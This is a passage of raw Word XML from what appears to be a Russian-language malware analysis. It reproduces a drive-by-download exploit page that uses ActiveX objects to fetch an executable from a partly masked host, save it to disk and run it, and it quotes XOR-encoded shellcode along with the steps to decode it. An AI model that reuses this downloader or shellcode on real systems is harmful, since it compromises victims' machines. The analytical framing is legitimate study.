          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="132"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">try </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="132"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="132"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>eval(r = CLSID.GetObject("", name)') }catch(e){} } if (! r) {try {evalfr = CLSID.GetObject(name, "")') }catch(e){} } if (! r) {try {evalfr = CLSID.GetObject(name)') }catch(e){} } return(r);</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XMLHttpDownload(xml, url) { try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xml.open("GET", url, false); xml.send(null);</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catch(e) { return 0;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return xml.responseBody;</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ADOBDStreamSave(o, name, data) { try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o.Type = 1; o.Mode = 3; o.Open(); o. Write(data); o.SaveToFile(name, 2); o.Close();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catch(e) { return 0;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lastRenderedPageBreak/>
        <w:t>return 1;</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ShellExecute(exec, name, type)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(type == 0)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try { exec.Run(name, 0); return 1;} catch(e)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else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try { exe.ShellExecute(name); return 1; } catch(e) {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return(0);</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MDAC()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t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '@D96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-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47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-</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4ee6-8 79c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="131"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2980"/>
          <w:tab w:val="right" w:pos="9690"/>
        </w:tabs>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F4C2-43c8-8358-09FCD1DB0766}',</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="132"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>'{639F725F-1B2D-4831-A9FD-874847682010}',</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="132"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>'@A018599-1DB3-44f9-83B4-461454C84BF8}',</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'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);</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v = new Array(null, null, null);</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i = 0;</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n = 0;</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ret = 0;</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urlRealExe = 'http://list***.org/forum/file.php';</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while (t[i] &amp;&amp; (! v[0]</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="133"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="100"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="133"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="132"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>! v[1]</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="133"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="100"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="133"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="132"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>! v[2]) ) { var a = null;</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try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a = document.createElement("object");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a.setAUribute(''classid'', "clsid.:" + t[i].substring(1, t[i].length -1));</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catch(e) { a = null;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(a)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v[0])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v[0] = CreateObject(a, "msxml2.XMLHTTP");</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v[0]) v[0] = CreateObject(a, "Microsoft.XMLHTTP");</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v[0]) v[0] = CreateObject(a, "MSXML2.ServerXMLHTTP");</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v[1])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v[1] = CreateObject(a, "ADODB.Stream");</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v[2])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v[2] = CreateObject(a, "WScript.Shell"); if (! v[2])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v[2] = CreateObject(a, "Shell.Application");</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if(v[2]) n=1;</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lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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lang w:eastAsia="ru-RU"/>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lang w:eastAsia="ru-RU"/>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if(v[0] &amp;&amp; v[1] &amp;&amp; v[2])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data = XMLHttpDownload(v[0], urlRealExe); if (data != 0)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name = "c:\\sys"+GetRandString(4)+".exe"; if (ADOBDStreamSave(v[1], name, data) == 1) { if (ShellExecute(v[2], name, n) == 1) { ret=1;</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return ret;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start()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MDAC() ) { startOverflow(</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="13TimesNewRoman1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="132"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>);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&lt;/script&gt;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&lt;/head&gt;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&lt;body onload= "start() "&gt;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&lt;div id=''mydiv”&gt;&lt;/div&gt;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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="131"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="132"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</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Данный скрипт использует одну из следующих уязвимостей с целью инициировать переполнение буфера:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="692"/>
        </w:tabs>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переполнение буфера при вызове </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">setSlice() </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">метода для </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">WebViewFolderIcon ActiveX </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">объекта </w:t>
      </w:r>
      <w:hyperlink r:id="rId122" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>(MS06-57)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="692"/>
        </w:tabs>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переполнение в </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Apple QuickTime </w:t>
      </w:r>
      <w:hyperlink r:id="rId123" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>(CVE-2004-0431)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="692"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">переполнение буфера при вызове </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CreateNewFolderFromName() </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">метода для </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">WinZip FileView ActiveX </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">элемента управления </w:t>
      </w:r>
      <w:hyperlink r:id="rId124" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>(MS06-067)</w:t>
        </w:r>
      </w:hyperlink>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Предварительно скрипт «распыляет» свой исполняемый код </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(shellcode), </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>который загружает файлы из Интернета без ведома пользователя:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="610"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="66"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>“%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%ufffJ%u8b7J%udf4e%uefef</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="610"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="66"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb...”</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Чтобы доказать вредоносность данного кода, преобразуем его в двоичный вид. Для этого необходимо выполнить следующие действия:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>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 Удалить все символы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="56"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>%u</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>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 Поменять местами младший и старший байты в </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Unicode </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>слове</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>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 Преобразовать </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ASCII </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>формат в шестнадцатеричное представление.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Сохранить данные в двоичном формате</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Давайте взглянем на получившийся код в дизассемблере:</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Очевидно, что код программы зашифрован с помощью логической </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">операции </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">xor. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы выполнить расшифровку нашего кода, необходимо сложить по модулю два каждый байт, начиная с адреса :00000015 со значением </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="570"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«0</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="570"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>EFh</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="570"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:framePr w:h="2726" w:wrap="notBeside" w:vAnchor="text" w:hAnchor="text" w:xAlign="center" w:y="1"/>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6035040" cy="17297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35040" cy="172974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И теперь уже можно утверждать, что данный код действительно загружает следующую ссылку при помощи вызовов </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">URLMON.DLL </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">библиотеки: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="561"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="561"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="561"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="560"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ***. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="561"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>org</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="561"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="561"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>forum</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="561"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="561"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="561"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="561"/>
